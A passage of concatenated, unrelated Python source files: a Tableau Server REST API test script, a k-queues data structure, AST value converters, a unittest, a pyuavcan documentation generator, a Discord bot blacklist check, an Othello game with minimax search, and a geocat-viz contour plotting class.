preview image t_site.log(u"Saving workbook preview image") t_site.save_workbook_preview_image(new_wb_luid, u'Workbook preview') t_site.log(u"Downloading workbook file") t_site.download_workbook(new_wb_luid, u'saved workbook') t_site.log(u"Query workbook connections") t_site.query_workbook_connections(new_wb_luid) t_site.log(u"Querying workbook views") wb_views = t_site.query_workbook_views(new_wb_luid) wb_views_dict = t_site.convert_xml_list_to_name_id_dict(wb_views) t_site.log(unicode(wb_views_dict)) for wb_view in wb_views_dict: t_site.log(u"Adding {} to favorites for me".format(wb_view)) t_site.add_view_to_user_favorites(u'Fav - {}'.format(wb_view), t_site.username, wb_view, wb_name_or_luid=new_wb_luid) for wb_view in wb_views_dict: t_site.log(u"Deleting {} from favorites for me".format(wb_view)) t_site.delete_views_from_user_favorites(wb_views_dict.get(wb_view), t_site.username, new_wb_luid) t_site.log(u'Adding tags to workbook') t_site.add_tags_to_workbook(new_wb_luid, [u'workbooks', u'flights', u'cool', u'晚飯']) t_site.log(u'Deleting a tag from workbook') t_site.delete_tags_from_workbook(new_wb_luid, u'flights') t_site.log(u"Add workbook to favorites for me") t_site.add_workbook_to_user_favorites(u'My favorite workbook', new_wb_luid, t_site.username) t_site.log(u"Deleting workbook from favorites for me") t_site.delete_workbooks_from_user_favorites(new_wb_luid, t_site.username) # # Saving view as file # for wb_view in wb_views_dict: # t_site.log(u"Saving a png for {}".format(wb_view) # t_site.save_workbook_view_preview_image(wb_luid, wb_views_dict.get(wb_view), '{}_preview'.format(wb_view)) t_site.log(u'Deleting workbook') t_site.delete_workbooks(new_wb_luid_2) print(u'Finished Workbook tests') def publishing_datasources_test(t_site, tdsx_file, tdsx_content_name): """ :type t_site: TableauRestApiConnection :param tdsx_file: :param tdsx_content_name: :return: """ print(u"Starting Datasource tests") default_project = t_site.query_project(u'Default') t_site.log(u"Publishing as {}".format(tdsx_content_name)) new_ds_luid = t_site.publish_datasource(tdsx_file, tdsx_content_name, default_project, overwrite=True) time.sleep(3) projects = t_site.query_projects() projects_dict = t_site.convert_xml_list_to_name_id_dict(projects) projects_list = projects_dict.keys() t_site.log(u'Moving datasource to {} project'.format(projects_list[1])) t_site.update_datasource(new_ds_luid, default_project.luid, new_project_luid=projects_dict[projects_list[1]]) t_site.log(u"Querying datasource") t_site.query_workbook(new_ds_luid) t_site.log(u'Downloading and saving datasource') t_site.download_datasource(new_ds_luid, u'saved_datasource') # Can't add to favorites until API version 2.3 if isinstance(t_site, TableauRestApiConnection23): t_site.log(u'Adding to Favorites') t_site.add_datasource_to_user_favorites(u'The Greatest Datasource', new_ds_luid, t_site.username) t_site.log(u'Removing from Favorites') t_site.delete_datasources_from_user_favorites(new_ds_luid, t_site.username) # t_site.log("Publishing TDS with credentials -- reordered args") # tds_cred_luid = t_site.publish_datasource('TDS with Credentials.tds', 'TDS w Creds', project, # connection_username='postgres', overwrite=True, connection_password='') # t_site.log("Update Datasource connection") # t_site.update_datasource_connection(tds_cred_luid, 'localhost', '5432', db_username, db_password) # t_site.log("Deleting the published DS") # t_site.delete_datasources(new_ds_luid) print(u'Finished Datasource Tests') def schedule_test(t_site): """ :type t_site: 
TableauRestApiConnection23 :return: """ print(u'Started Schedule tests') all_schedules = t_site.query_schedules() schedule_dict = t_site.convert_xml_list_to_name_id_dict(all_schedules) t_site.log(u'All schedules on Server: {}'.format(unicode(schedule_dict))) try: t_site.log(u'Creating a daily extract schedule') t_site.create_daily_extract_schedule(u'Afternoon Delight', start_time=u'13:00:00') except AlreadyExistsException as e: t_site.log(u'Skipping the add since it already exists') try: t_site.log(u'Creating a monthly subscription schedule') new_monthly_luid = t_site.create_monthly_subscription_schedule(u'First of the Month', u'1', start_time=u'03:00:00', parallel_or_serial=u'Serial') t_site.log(u'Deleting monthly subscription schedule LUID {}'.format(new_monthly_luid)) time.sleep(4) t_site.delete_schedule(new_monthly_luid) except AlreadyExistsException as e: t_site.log(u'Skipping the add since it already exists') try: t_site.log(u'Creating a monthly extract schedule') t_site.create_monthly_extract_schedule(u'Last Day of Month', u'LastDay', start_time=u'03:00:00', priority=25) except AlreadyExistsException as e: t_site.log(u'Skipping the add since it already exists') try: t_site.log(u'Creating a weekly extract schedule') weekly_luid = t_site.create_weekly_subscription_schedule(u'Mon Wed Fri', [u'Monday', u'Wednesday', u'Friday'], start_time=u'05:00:00') time.sleep(4) t_site.log(u'Updating schedule with LUID {}'.format(weekly_luid)) t_site.update_schedule(weekly_luid, new_name=u'Wed Fri', interval_value_s=[u'Wednesday', u'Friday']) except AlreadyExistsException as e: t_site.log(u'Skipping the add since it already exists') print(u'Finished Schedule tests') def subscription_tests(t_site): """ :type t_site: TableauRestApiConnection23 :return: """ print(u'Starting Subscription tests') # All users in a Group groups = t_site.query_groups() groups_dict = t_site.convert_xml_list_to_name_id_dict(groups) group_names = groups_dict.keys() users_in_group = t_site.query_users_in_group(groups_dict[group_names[0]]) users_dict = t_site.convert_xml_list_to_name_id_dict(users_in_group) usernames = users_dict.keys() wbs = t_site.query_workbooks() wbs_dict = t_site.convert_xml_list_to_name_id_dict(wbs) wb_names = wbs_dict.keys() # Grab first workbook wb_luid = wbs_dict[wb_names[0]] sub_schedules = t_site.query_subscription_schedules() sched_dict = t_site.convert_xml_list_to_name_id_dict(sub_schedules) sched_names = sched_dict.keys() # Grab first schedule sched_luid = sched_dict[sched_names[0]] # Subscribe them to the first workbook t_site.log(u'Adding subscription with subject Important weekly update to first workbook for all users in group 1') for user in users_dict: t_site.create_subscription_to_workbook(u'Important weekly update', wb_luid, sched_luid, users_dict[user]) # Find the subscriptions for user 1, delete t_site.query_subscriptions() user_1_subs = t_site.query_subscriptions(username_or_luid=usernames[0]) t_site.log(u'Deleting all subscriptions for user 1') for sub in user_1_subs: luid = sub.get(u'id') t_site.delete_subscriptions(luid) # Update user 2 subscriptions t_site.log(u'Updating user 2s subscriptions to second schedule') user_2_subs = t_site.query_subscriptions(username_or_luid=usernames[1]) for sub in user_2_subs: luid = sub.get(u'id') t_site.update_subscription(luid, schedule_luid=sched_dict[sched_names[1]]) print(u'Finished subscription tests') def revision_tests(t_site, workbook_name, project_name): """ :type t_site: TableauRestApiConnection23 :return: """ print(u'Starting revision tests') 
revisions = t_site.get_workbook_revisions(workbook_name, project_name) t_site.log(u'There are {} revisions of workbook {}'.format(len(revisions), workbook_name)) print(u'Finished revision tests') def extract_refresh_test(t_site): """ :type t_site: TableauRestApiConnection26 :return: """ # Only possible in 10.3 / API 2.6 and above if isinstance(t_site, TableauRestApiConnection26): print(u'Starting Extract Refresh tests') tasks = t_site.get_extract_refresh_tasks() print(u'Finished Extract Refresh tests') for server in servers: print u"Logging in to {}".format(servers[server][u'server']) run_tests(servers[server][u'server'], servers[server][u'username'], servers[server][u'password']) class KStacks(): def __init__(self, k, capacity): self.nextAvailable = 0 self.data = [0] * capacity self.front = [-1] * k self.rear = [-1] * k self.nextIndex = [i+1 for i in range(capacity)] self.nextIndex[capacity-1] = -1 def isFull(self): return self.nextAvailable == -1 def isEmpty(self, k): return self.front[k] == -1 def enqueue(self, k, data): if self.isFull(): return nextFree = self.nextIndex[self.nextAvailable] if self.isEmpty(k): self.front[k] = self.rear[k] = self.nextAvailable else: self.rear[k] = self.nextAvailable self.nextIndex[ self.front[k] ] = self.nextAvailable self.nextIndex[self.nextAvailable] = -1 self.data[ self.nextAvailable ] = data self.nextAvailable = nextFree def dequeue(self, k): if self.isEmpty(k): return None fetch_index = self.front[k] ret_data = self.data[fetch_index] self.front[k] = self.nextIndex[fetch_index] self.nextIndex[fetch_index] = self.nextAvailable self.nextAvailable = fetch_index return ret_data if __name__ == '__main__': k_stack = KStacks(3, 4) k_stack.enqueue(0, 10) k_stack.enqueue(1, 20) k_stack.enqueue(2, 30) k_stack.enqueue(0, 40) k_stack.enqueue(1, 50) k_stack.dequeue(0) k_stack.dequeue(1) from .. import value def Num(node): return value.Value(node.n), [] def Str(node): return value.Value(node.s), [] def Bytes(node): return value.Value(node.s), [] def NameConstant(node): return value.Value(node.value), [] def List(node): return lambda *d: list(d), node.elts def Tuple(node): return lambda *d: tuple(d), node.elts def Set(node): return lambda *d: set(d), node.elts def Dict(node): assert len(node.keys) == len(node.values) length = len(node.keys) def make_dict(*keys_values): keys, values = keys_values[:length], keys_values[length:] return {k: v for k, v in zip(keys, values)} return make_dict, list(node.keys) + list(node.values) def Ellipsis(node): raise ValueError('Ellipsis (...) is not implemented.') import __future__ import unittest from api import VrayPropManApi class TestApi(unittest.TestCase): def setUp(self): unittest.TestCase.setUp(self) self._api = VrayPropManApi() def test_propname_index_mapping(self): prop_names = self._api.get_property_names() # test round trip mapping index_list = [self._api.get_property_index(name) for name in prop_names] test_vals = [self._api.get_property_name_from_index(index) for index in index_list] self.assertListEqual(prop_names, test_vals) if __name__ == '__main__': unittest.main() #!/usr/bin/env python3 # # Copyright (c) 2019 UAVCAN Development Team # This software is distributed under the terms of the MIT License. # Author: <> # import re import typing import textwrap import dataclasses import configparser import pyuavcan HEADER_SUFFIX = '\n' + '.' 
* 80 + '\n' cp = configparser.ConfigParser() cp.read('../setup.cfg') extras: typing.Dict[str, str] = dict(cp['options.extras_require']) print('If you need full-featured library, use this and read no more::', end='\n\n') print(f' pip install pyuavcan[{",".join(extras.keys())}]', end='\n\n') print('If you want to know what exactly you are installing, read on.', end='\n\n') @dataclasses.dataclass(frozen=True) class TransportOption: name: str class_name: str extras: typing.Dict[str, str] transport_options: typing.List[TransportOption] = [] # noinspection PyTypeChecker pyuavcan.util.import_submodules(pyuavcan.transport) for cls in pyuavcan.util.iter_descendants(pyuavcan.transport.Transport): transport_name = cls.__module__.split('.')[2] # pyuavcan.transport.X relevant_extras: typing.Dict[str, str] = {} for k in list(extras.keys()): if k.startswith(f'transport_{transport_name}'): relevant_extras[k] = extras.pop(k) transport_module_name = re.sub(r'\._[_a-zA-Z0-9]*', '', cls.__module__) transport_class_name = transport_module_name + '.' + cls.__name__ transport_options.append(TransportOption(name=transport_name, class_name=transport_class_name, extras=relevant_extras)) for to in transport_options: print(f'{to.name} transport' + HEADER_SUFFIX) print(f'This transport is implemented by :class:`{to.class_name}`.') if to.extras: print('The following installation options are available:') print() for key, deps in to.extras.items(): print(f'{key}') print(' This option pulls the following dependencies::', end='\n\n') print(textwrap.indent(deps.strip(), ' ' * 6), end='\n\n') else: print('This transport has no installation dependencies.') print() other_extras: typing.Dict[str, str] = {} for k in list(extras.keys()): if not k.startswith(f'transport_'): other_extras[k] = extras.pop(k) if other_extras: print('Other installation options' + HEADER_SUFFIX) print('These installation options are not related to any transport.', end='\n\n') for key, deps in other_extras.items(): print(f'{key}') print(' This option pulls the following dependencies:', end='\n\n') print(' .. 
code-block::', end='\n\n') print(textwrap.indent(deps.strip(), ' ' * 6), end='\n\n') print() if extras: raise RuntimeError(f'No known transports to match the following installation options (typo?): ' f'{list(extras.keys())}') Preen1/Antipetros_Discord_Bot """ [summary] [extended_summary] """ # region [Imports] # * Standard Library Imports ------------------------------------------------------------------------------------------------------------------------------------> # * Standard Library Imports --> import os # * Gid Imports --> import gidlogger as glog # * Local Imports --> from antipetros_discordbot.init_userdata.user_data_setup import ParaStorageKeeper # * Third Party Imports -----------------------------------------------------------------------------------------------------------------------------------------> # import requests # import pyperclip # import matplotlib.pyplot as plt # from bs4 import BeautifulSoup # from dotenv import load_dotenv # from discord import Embed, File # from github import Github, GithubException # from jinja2 import BaseLoader, Environment # from natsort import natsorted # from fuzzywuzzy import fuzz, process # * PyQt5 Imports -----------------------------------------------------------------------------------------------------------------------------------------------> # from PyQt5.QtGui import QFont, QIcon, QBrush, QColor, QCursor, QPixmap, QStandardItem, QRegExpValidator # from PyQt5.QtCore import (Qt, QRect, QSize, QObject, QRegExp, QThread, QMetaObject, QCoreApplication, # QFileSystemWatcher, QPropertyAnimation, QAbstractTableModel, pyqtSlot, pyqtSignal) # from PyQt5.QtWidgets import (QMenu, QFrame, QLabel, QAction, QDialog, QLayout, QWidget, QWizard, QMenuBar, QSpinBox, QCheckBox, QComboBox, QGroupBox, QLineEdit, # QListView, QCompleter, QStatusBar, QTableView, QTabWidget, QDockWidget, QFileDialog, QFormLayout, QGridLayout, QHBoxLayout, # QHeaderView, QListWidget, QMainWindow, QMessageBox, QPushButton, QSizePolicy, QSpacerItem, QToolButton, QVBoxLayout, QWizardPage, # QApplication, QButtonGroup, QRadioButton, QFontComboBox, QStackedWidget, QListWidgetItem, QSystemTrayIcon, QTreeWidgetItem, # QDialogButtonBox, QAbstractItemView, QCommandLinkButton, QAbstractScrollArea, QGraphicsOpacityEffect, QTreeWidgetItemIterator) # * Gid Imports -------------------------------------------------------------------------------------------------------------------------------------------------> # from antipetros_discordbot.utility.gidtools_functions import ( readit, clearit, readbin, writeit, loadjson, pickleit, writebin, pathmaker, writejson, # dir_change, linereadit, get_pickled, ext_splitter, appendwriteit, create_folder, from_dict_to_file) # * Local Imports -----------------------------------------------------------------------------------------------------------------------------------------------> # endregion[Imports] # region [TODO] # endregion [TODO] # region [AppUserData] # endregion [AppUserData] # region [Logging] log = glog.aux_logger(__name__) # endregion[Logging] # region [Constants] APPDATA = ParaStorageKeeper.get_appdata() BASE_CONFIG = ParaStorageKeeper.get_config('base_config') THIS_FILE_DIR = os.path.abspath(os.path.dirname(__file__)) # endregion[Constants] def user_not_blacklisted(bot, logger): async def predicate(ctx): if ctx.author.id in bot.blacklisted_user_ids(): log.warning('Tried invocation by blacklisted user: "%s", id: "%s"', ctx.author.name, str(ctx.author.id)) # TODO: maybe log reason for blacklist or tell reason # TODO: mark user as 
warned, then do not answer anymore, just delete the command # TODO: check if user is temporal blacklisted and tell him until when. # TODO: make as embed await ctx.send('''You are blacklisted, you can not use this bot and his commands anymore! If you think this is not correct please contact `@Giddi`! -This is the last time I am answering to and command from you, afterwards I will just delete your message!- This message will be removed in 2 minutes''', delete_after=120) await ctx.message.delete() return ctx.author.id not in bot.blacklisted_user_ids() return bot.add_check(predicate) # region[Main_Exec] if __name__ == '__main__': pass # endregion[Main_Exec] #!/usr/bin/python3 import os try: os.remove("pr_applicants.csv") except: print("already removed pr_applicants.csv") file = open("pr_applicants.csv", "w+") file.close() #Functions for game import numpy as np from matplotlib import pyplot as plt import time import random from random import choice import pickle from os.path import sep empty = 1 white = 0 black = 2 def createBoard(): board = np.empty((8,8)) for i in range(8): for j in range(8): board[i][j] = empty board[3][3] = white board[4][4] = white board[4][3] = black board[3][4] = black return board def countColor(board,color): colors = 0 for i in range(8): for j in range(8): if board[i][j] == color: colors += 1 return colors def weightedCountColor(board,color): colors = 0 for i in range(8): for j in range(8): if board[i][j] == color: if (i,j) == (0,0) or (i,j) == (0,7) or (i,j) == (7,0) or (i,j) == (7,7): colors += 1000 elif i == 0 or j == 0 or i == 7 or j == 7: colors += 100 else: colors += 1 return colors def onBoard(i,j,board): if (i <= board.shape[0]-1 and i >= 0) and (j <= board.shape[1]-1 and j >= 0):# You need some more conditions here! return True else: return False def getOtherColor(color): if color == white: return black elif color == black: return white else: return None def isSequence(placedChip,neighborChip,board): capturedColor = board[neighborChip[0]][neighborChip[1]] otherColor = getOtherColor(capturedColor) di = neighborChip[0] - placedChip[0] dj = neighborChip[1] - placedChip[1] currentCoords = (neighborChip) for i in range(1,8): if not onBoard(i * di + neighborChip[0],i * dj + neighborChip[1],board): return False currentCoords = (i * di + neighborChip[0],i * dj + neighborChip[1]) currentColor = board[currentCoords[0]][currentCoords[1]] if currentColor == otherColor: return True elif currentColor == capturedColor: continue elif currentColor == empty: return False def getPossibleMoves(color,board): possibleMoves = [] for i in range(8): for j in range(8): if board[i][j] == empty: for neighbor in [(i-1, j),(i, j-1),(i+1, j),(i, j+1),(i+1, j+1),(i-1, j+1),(i-1, j-1),(i+1, j-1)]: if onBoard(neighbor[0],neighbor[1],board) and board[neighbor[0]][neighbor[1]] == getOtherColor(color): if isSequence((i,j),neighbor,board): possibleMoves.append((i,j)) return possibleMoves def placeMarker(color,coordinates,boar): board = np.copy(boar) otherColor = getOtherColor(color) i = coordinates[0] j = coordinates[1] board[i][j] = color for neighbor in [(i-1, j),(i, j-1),(i+1, j),(i, j+1),(i+1, j+1),(i-1, j+1),(i-1, j-1),(i+1, j-1)]: if onBoard(neighbor[0],neighbor[1],board) and board[neighbor[0]][neighbor[1]] == getOtherColor(color): if isSequence((i,j),neighbor,board): board[neighbor[0]][neighbor[1]] = color di = neighbor[0] - i dj = neighbor[1] - j for y in range(1,8): if not onBoard(y * di + neighbor[0],y * dj + neighbor[1],board): break currentCoords = (y * di + neighbor[0],y * dj + 
neighbor[1]) currentColor = board[currentCoords[0]][currentCoords[1]] if currentColor == color: break elif currentColor == otherColor: board[y * di + neighbor[0]][y * dj + neighbor[1]] = color elif currentColor == empty: break return board def getMaxMove(turn,board): moves = getPossibleMoves(turn,board) maxMove = (-5,-5) maximum = 0 for move in moves: tempBoard = placeMarker(turn,move,board) num = countColor(tempBoard,turn) if num > maximum: maximum = num maxMove = move return maxMove def getSmartMove1D(turn,board): max_ = -1 maxMove = (-5,-5) moves = getPossibleMoves(turn,board) enemy = getOtherColor(turn) for moves in moves: tempBoard = placeMarker(turn,move,board) enemyMoves = getPossibleMoves(enemy,tempBoard) enemyMove = getMaxMove(enemy,tempBoard) tempBoard = placeMarker(enemy,enemyMove,tempBoard) num = countColor(tempBoard,turn) if num > max_: max_ = num maxMove = move return move def utility(turn, board): opponent = getOtherColor(turn) p = 0 m = 0 e = 0 for i in range(8): for j in range(8): if board[i][j] == empty: e += 1 elif board[i][j] == turn: p += 1 elif board[i][j] == opponent: m += 1 else: print("Critical Error") if e == 0 and p > m: return 100 elif e == 0 and p < m: return -100 else: return p - m def deep2(turn, board, turn0): op = getOtherColor(turn) maxMove = (-5,-5) ma = -999999999 if countColor(board,empty) == 0: return countColor(board,turn0) - countColor(board,getOtherColor(turn0)) moves = getPossibleMoves(turn, board) for move in moves: tempBoard = placeMarker(turn,move,board) opMove = getMaxMove(op,tempBoard) tempBoard = placeMarker(op,opMove,tempBoard) moves2 = getPossibleMoves(turn,tempBoard) for move2 in moves2: tempBoard2 = placeMarker(turn,move2,tempBoard) opMove = getMaxMove(op,tempBoard2) score = countColor(tempBoard2,turn) - countColor(tempBoard2,op) if score > ma: ma = score maxMove = move return maxMove def recursive(turn,board,turn0,depth): op = getOtherColor(turn) if countColor(board,empty) == 0 or depth == 6: return countColor(board,turn0) - countColor(board,getOtherColor(turn0)) moves = getPossibleMoves(turn, board) maxScore = -90 maxMove = (-5,-5) minScore = 90 for move in moves: tempBoard = placeMarker(turn,move,board) score = recursive(op,tempBoard,turn0,depth + 1) if score > maxScore: maxScore = score maxMove = move if score < minScore: minScore = score if depth == 0: return maxMove elif depth % 2 == 0: return maxScore elif depth % 2 == 1: return minScore def weightedRecursive(turn,board,turn0,depth): op = getOtherColor(turn) if countColor(board,empty) == 0 or depth == 6: return weightedCountColor(board,turn0) - weightedCountColor(board,getOtherColor(turn0)) moves = getPossibleMoves(turn, board) maxScore = -90 maxMove = (-5,-5) minScore = 90 for move in moves: tempBoard = placeMarker(turn,move,board) score = recursive(op,tempBoard,turn0,depth + 1) if score > maxScore: maxScore = score maxMove = move if score < minScore: minScore = score if depth == 0: return maxMove elif depth % 2 == 0: return maxScore elif depth % 2 == 1: return minScore def random(turn, board): moves = getPossibleMoves(turn, board) return random.choice(moves) def flipBoard(origionalBoard): board = np.copy(origionalBoard) for i in range(8): for j in range(8): if board[i][j] == white: board[i][j] = black elif board[i][j] == black: board[i][j] = white return board def generateGames(numGames): for i in range(1000000): movesBlack = [] board = createBoard() turn = white while countColor(board,empty) > 0: moves = getPossibleMoves(turn,board) if len(moves) == 0 and 
len(getPossibleMoves(getOtherColor(turn),board)) == 0: break if len(moves) == 0: turn = getOtherColor(turn) continue move = recursive(turn,board,turn,0) if turn == black: movesBlack.append((board,move)) else: movesBlack.append((flipBoard(board),move)) board = placeMarker(turn,move,board) turn = getOtherColor(turn) #print('black',countColor(board, black), 'white',countColor(board, white)) with open("Games2" + sep + str(i) + '_othello.pkl','wb') as outFile: pickle.dump(movesBlack,outFile) print(i) print('===================================================================================================') print('You, the player are playing the white pieces. The computer will play the black pieces') print('When it is your turn, the board will be shown with title "White\'s Turn"') print('Close the board and type in the i and j coordinates of your move when prompted by the terminal') print('If you choose an invalid move, the computer will say invalid move and show the board again. Close the board and type in your move coordinates') print('If your move is valid, the board will be shown with title "Black\'s turn, and your move will be shown on the board') print('Close the board and when the computer is done picking a move, the board will be shown with title "White\'s turn" and it will be your turn to move again.') print('Next time the game is updated, i will make it GUI based input so it is easier') print('===================================================================================================') print('') board = createBoard() turn = white plt.imshow(board,cmap = 'binary') plt.title("White's Turn") plt.xlabel('J') plt.ylabel('I') plt.show() boards = [] while not countColor(board,empty) == 0: if turn == white: i = input('i: ') j = input('j: ') if 'show' in i or 'show' in j: plt.imshow(board,cmap = 'binary') plt.title("White's Turn") plt.xlabel('J') plt.ylabel('I') plt.show() continue if 'last' in i or 'last' in j: for boar in boards[-3:]: plt.imshow(boar,cmap = 'binary') plt.show() continue i = int(i) j = int(j) move = (i,j) moves = getPossibleMoves(turn,board) if len(moves) == 0: turn = getOtherColor(turn) continue if not move in moves: plt.imshow(board,cmap = 'binary') plt.title("Not a Valid Move, Try Again") plt.xlabel('J') plt.ylabel('I') plt.show() continue board = placeMarker(turn,move,board) plt.imshow(board,cmap = 'binary') plt.title("Black's Turn") plt.xlabel('J') plt.ylabel('I') plt.show() turn = getOtherColor(turn) else: time.sleep(2) moves = getPossibleMoves(turn,board) if len(moves) == 0: turn = getOtherColor(turn) continue move = recursive(turn,board,turn,0)#deep2(turn,board,turn) board = placeMarker(turn,move,board) turn = getOtherColor(turn) for boar in boards: plt.imshow(boar,cmap='binary') plt.imshow(board,cmap = 'binary') plt.title("White's Turn") plt.xlabel('J') plt.ylabel('I') plt.show() boards.append(board) anissa111/geocat-viz """Plotting wrapper for matplotlib contourf function.""" import xarray as xr import warnings from ._plot_util import NCL_Plot class Contour(NCL_Plot): """Create contour plot with optional contour labels. Args: data (:class:`xarray.DataArray` or :class:`numpy.ndarray`): The dataset to plot. If inputted as a Xarray file, titles and labels will be automatically inferred. Kwargs: add_colorbar (:obj:`bool`): Whether a colorbar is added to the figure. Default True. clevels (:obj:`list` or :class:`numpy.ndarray`): List or array of levels to be passed into matplotlib's contour function. 
cmap (:class:`cmaps.colormap.Colormap`): Colormap for the filled contour graph. contour_fill (:obj:`bool`): Whether filled contours will be drawn. Default True. contour_lines (:obj:`bool`): Whether contours lines will be drawn. Default True. contourbackground (:obj:`bool`): Whether a white background for the contour labels will be drawn. Default False. contourfontsize (:obj:`int`): Font size of the contour line labels. Default 12. contourlabels (:obj:`list` or :class:`numpy.ndarray`): List or array of labels to use for contour line labels. drawcontourlabels(:obj:`bool`): Whether add contour line labels to the figure. flevels (:obj:`list` or :class:`numpy.ndarray`): List or array of levels to be passed into matplotlib's contourf function. linecolor (:obj:`str`): Color of the contour line. Default "black". linestyle (:obj:`str`): Linestyle of the contour line. Default solid for positive values, dashed for negative values. linewidth (:obj:`int`): Width of the contour lines. Default 0.4. manualcontourlabels (:obj:`bool`): Whether contour line labels should be manually drawn. Default False. projection (:obj:`str`): Cartopy map projection. `See Cartopy documentation for full list. `_ X (:class:`xarray.core.dataarray.DataArray'>` or :class:`numpy.ndarray`): The X axis data for the dataset. To be specified if not inferred correctly automatically. Y (:class:`xarray.core.dataarray.DataArray'>` or :class:`numpy.ndarray`): The Y axis data for the dataset. To be specified if not inferred correctly automatically. Return: (:class:`contourf.Contour`) A contour plot with specified input style. """ def __init__(self, *args, **kwargs): """Create contour figure. Generate filled contours and/or contour lines for figure. Add colorbar and contour labels if specified. Args: data (:class:`xarray.DataArray` or :class:`numpy.ndarray`): The dataset to plot. If inputted as a Xarray file, titles and labels will be automatically inferred. Kwargs: add_colorbar (:obj:`bool`): Whether a colorbar is added to the figure. Default True. clevels (:obj:`list` or :class:`numpy.ndarray`): List or array of levels to be passed into matplotlib's contour function. cmap (:class:`cmaps.colormap.Colormap`): Colormap for the filled contour graph. contour_fill (:obj:`bool`): Whether filled contours will be drawn. Default True. contour_lines (:obj:`bool`): Whether contours lines will be drawn. Default True. contourbackground (:obj:`bool`): Whether a white background for the contour labels will be drawn. Default False. contourfontsize (:obj:`int`): Font size of the contour line labels. Default 12. contourlabels (:obj:`list` or :class:`numpy.ndarray`): List or array of labels to use for contour line labels. drawcontourlabels(:obj:`bool`): Whether add contour line labels to the figure. flevels (:obj:`list` or :class:`numpy.ndarray`): List or array of levels to be passed into matplotlib's contourf function. linecolor (:obj:`str`): Color of the contour line. Default "black". linestyle (:obj:`str`): Linestyle of the contour line. Default solid for positive values, dashed for negative values. linewidth (:obj:`int`): Width of the contour lines. Default 0.4. manualcontourlabels (:obj:`bool`): Whether contour line labels should be manually drawn. Default False. projection (:obj:`str`): Cartopy map projection. `See Cartopy documentation for full list. `_ X (:class:`xarray.core.dataarray.DataArray'>` or :class:`numpy.ndarray`): The X axis data for the dataset. To be specified if not inferred correctly automatically. 
Y (:class:`xarray.core.dataarray.DataArray'>` or :class:`numpy.ndarray`): The Y axis data for the dataset. To be specified if not inferred correctly automatically. """ # Set default flevels, clevels, and colormap self._default_cmap = 'coolwarm' self._default_flevels = 5 self._default_clevels = 7 # Pull out args from data self.data = args[0] # If xarray file, format as Numpy array if isinstance(self.data, xr.DataArray): self.orig = self.data self.data = self.data.values # Read in or calculate filled levels using built in function if kwargs.get('contour_fill') is not False: if kwargs.get('flevels') is not None: # levels defined by kwargs self.levels = kwargs.get('flevels') elif kwargs.get('flevels') is None: # take a guess at filled levels self._estimate_flevels # Pull in X and Y axis data if specified if kwargs.get("X") is not None: self.X = kwargs.get("X") if kwargs.get("Y") is None: raise AttributeError("If X is defined, Y must also be defined.") else: self.X = kwargs.get("X") if kwargs.get("Y") is not None: self.Y = kwargs.get("Y") if kwargs.get("X") is None: raise AttributeError("If Y is defined, X must also be defined.") else: self.Y = kwargs.get("Y") # Pull in whether to draw filled contours and/or contour lines self.contour_lines = kwargs.get('contour_lines') self.contour_fill = kwargs.get('contour_fill') # Read in or calculate contour levels using built in function if kwargs.get('contour_lines') is not False: if kwargs.get('clevels') is not None: # levels defined by kwargs self.levels = kwargs.get('clevels') elif kwargs.get('clevels') is None: # take a guess at filled levels self._estimate_clevels # Read in style of contour lines if kwargs.get("linecolor") is None: self.linecolor = "black" else: self.linecolor = kwargs.get("linecolor") self.linestyle = kwargs.get("linestyle") if kwargs.get("linewidth") is None: self.linewidth = 0.4 else: self.linewidth = kwargs.get("linewidth") # Set colormap to specified or default value if kwargs.get('cmap') is not None: self.cmap = kwargs.get('cmap') else: self.cmap = self._default_cmap # Pull out contour line label specific kwargs if kwargs.get("drawcontourlabels") is not None: self.draw_contour_labels = kwargs.get("drawcontourlabels") else: self.draw_contour_labels = False if kwargs.get("manualcontourlabels") is not None: self.manualcontourlabels = kwargs.get("manualcontourlabels") else: self.manualcontourlabels = False self.contourlabels = kwargs.get("contourlabels") self.contourfontsize = kwargs.get("contourfontsize") self.contourbackground = kwargs.get("contourbackground") # Call parent class constructor NCL_Plot.__init__(self, *args, **kwargs) # Add filled contours and/or contour lines to figure, as specified self._generate_contours() # Set figure in NCL style self._set_NCL_style(self.ax) # If contour labels are requested, try to set them on contour lines. 
If failed, use filled contours if self.draw_contour_labels is True: try: self._add_contour_labels(self.ax, self.cl, contourlabels=self.contourlabels, fontsize=self.contourfontsize, background=self.contourbackground) except: if self.contour_fill is not False: self._add_contour_labels(self.ax, self.cf, contourlabels=self.contourlabels, fontsize=self.contourfontsize, background=self.contourbackground) # Call colorbar creation from parent class # Set colorbar if specified # If not a subplot and add_colorbar and contour_fill is not false, add colorbar if (((self.add_colorbar is not False) and (self.add_colorbar != 'off') and (kwargs.get('contour_fill') is not False) and (self.subplot is None)) or # If subplot, check if in last position in subplot and that add_colorbar is not False and plot ((self.subplot is not None) and (self.subplot[2] == self.subplot[0]) and (self.add_colorbar is not False) and (self.add_colorbar != "off"))): if self.contour_fill is not False: self._add_colorbar(mappable=self.cf) def _generate_contours(self, *args, **kwargs): """Generate filled contours and/or contour lines for figure. Kwargs: cmap (:class:`cmaps.colormap.Colormap`): Colormap for the filled contour graph. contour_fill (:obj:`bool`): Whether filled contours will be drawn. Default True. contour_lines (:obj:`bool`): Whether contours lines will be drawn. Default True. linecolor (:obj:`str`): Color of the contour line. Default "black". linestyle (:obj:`str`): Linestyle of the contour line. Default solid for positive values, dashed for negative values. linewidth (:obj:`int`): Width of the contour lines. Default 0.4. projection (:obj:`str`): Cartopy map projection. `See Cartopy documentation for full list. `_ X (:class:`xarray.core.dataarray.DataArray'>` or :class:`numpy.ndarray`): The X axis data for the dataset. To be specified if not inferred correctly automatically. Y (:class:`xarray.core.dataarray.DataArray'>` or :class:`numpy.ndarray`): The Y axis data for the dataset. To be specified if not inferred correctly automatically. 
